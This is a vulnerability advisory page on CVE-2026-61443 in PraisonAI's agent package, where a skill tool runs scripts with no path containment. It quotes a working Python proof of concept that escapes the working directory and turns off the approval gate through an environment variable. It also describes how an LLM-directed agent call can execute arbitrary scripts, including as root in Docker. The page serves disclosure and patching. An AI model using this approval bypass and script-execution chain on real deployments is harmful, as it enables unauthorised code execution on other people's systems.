Answer in brief
CVE-2026-61443 records a High severity (CVSS 8.1) vulnerability in PraisonAI: SkillTools Executes Scripts Without Path Containment Validation. The current sources do not mark it as known exploited. The current feed maps praisonaiagents (pip), praisonaiagents (pypi). Check affected ranges and fixed versions before updating.
Analysis pending evidence review
HOL Guard separates source facts from reviewed analysis. See the methodology.
CVSS is 8.1. The current sources do not mark it as known exploited. Treat this as a source-backed prioritization signal, not a statement about your environment.
Analysis status
Analysis pending evidence review
Factual feed record only; HOL analysis is not approved for indexing. Read the methodology.
The current feed maps praisonaiagents (pip), praisonaiagents (pypi). Check affected ranges and fixed versions before updating.
| Package | Affected range | Fixed version |
|---|---|---|
| praisonaiagentspip | <=1.6.77 | 1.6.78 |
| praisonaiagentspypi | >=0 <1.6.78 | 1.6.78 |
Published upstream
Jul 15, 2026
Evidence: source:ghsa:source_dates:source-dates:recordSource modified
Oct 8, 2026
Evidence: source:ghsa:source_dates:source-dates:recordFirst seen by HOL
Jul 15, 2026
### Summary `SkillTools.run_skill_script()` accepts a `script_path` parameter and executes it via `subprocess.run()` without any path containment validation. While `FileTools` has `_validate_path()` with traversal detection, `SkillTools` performs none. An LLM-directed call can execute arbitrary scripts from any filesystem location. The `@require_approval` decorator can be bypassed via YAML `approve:` for high-risk tools. ### Details `src/praisonai-agents/praisonaiagents/tools/skill_tools.py` (lines 69-119): ```python def run_skill_script(self, script_path: str, ...): script_path = os.path.expanduser(script_path) if not os.path.isabs(script_path): script_path = os.path.join(self._working_directory, script_path) script_path = os.path.abspath(script_path) if not os.path.exists(script_path): return f"Error: Script not found at {script_path}" # No path traversal check, no containment validation # Directly executes whatever is at that path: result = subprocess.run(cmd, ...) ``` By contrast, `FileTools._validate_path()` (`src/praisonai-agents/praisonaiagents/tools/file_tools.py`, lines 42-78) properly validates that the resolved path stays within the working directory: ```python def _validate_path(self, filepath: str) -> str: # ... cwd = os.path.abspath(os.getcwd()) if os.path.commonpath([absolute, cwd]) != cwd: raise ValueError(f"Path traversal detected: {filepath} escapes workspace {cwd}") ``` `SkillTools` has no equivalent check. ### PoC ```python import os, tempfile from praisonaiagents.tools.skill_tools import SkillTools # Create a "safe" working directory (the jail) jail = tempfile.mkdtemp(prefix="skill_jail_") # Create a malicious script OUTSIDE the jail attack_script = os.path.join(tempfile.gettempdir(), "malicious_skill.sh") with open(attack_script, 'w') as f: f.write("#!/bin/bash\n") f.write("echo \"PROOF_OF_EXPLOIT: Script executed outside jail\"\n") f.write("echo \"USER: $(whoami)\"\n") f.write("echo \"HOSTNAME: $(hostname)\"\n") os.chmod(attack_script, 0o755) # Bypass approval (simulates Docker env or YAML approve:) os.environ["PRAISONAI_AUTO_APPROVE"] = "true" st = SkillTools() st._working_directory = jail # Pretend we're confined # Run script from OUTSIDE the jail — no path validation! result = st.run_skill_script(attack_script) print(result) # Output: # PROOF_OF_EXPLOIT: Script executed outside jail # USER: anushkavirgaonkar # HOSTNAME: Anushkas-MacBook-Pro-2.local # Cleanup del os.environ["PRAISONAI_AUTO_APPROVE"] os.unlink(attack_script) os.rmdir(jail) ``` **Tested result:** The script at `/tmp/malicious_skill.sh` executed successfully despite the working directory being set to a jail directory. The output confirms arbitrary script execution including `whoami` and `hostname`. No path containment check exists — the absolute path is accepted and executed directly. ### Impact - **Arbitrary script execution**: Run any script on the filesystem from any location - **Chaining with file write**: Write a malicious script via `write_file` (YAML-approvable as a high-risk tool), then execute it via `run_skill_script` - **Root-level impact in Docker**: All PraisonAI Docker containers run as root (no `USER` directive), so an escaped script runs with full root privileges
Quoted source text, attributed separately from HOL analysis.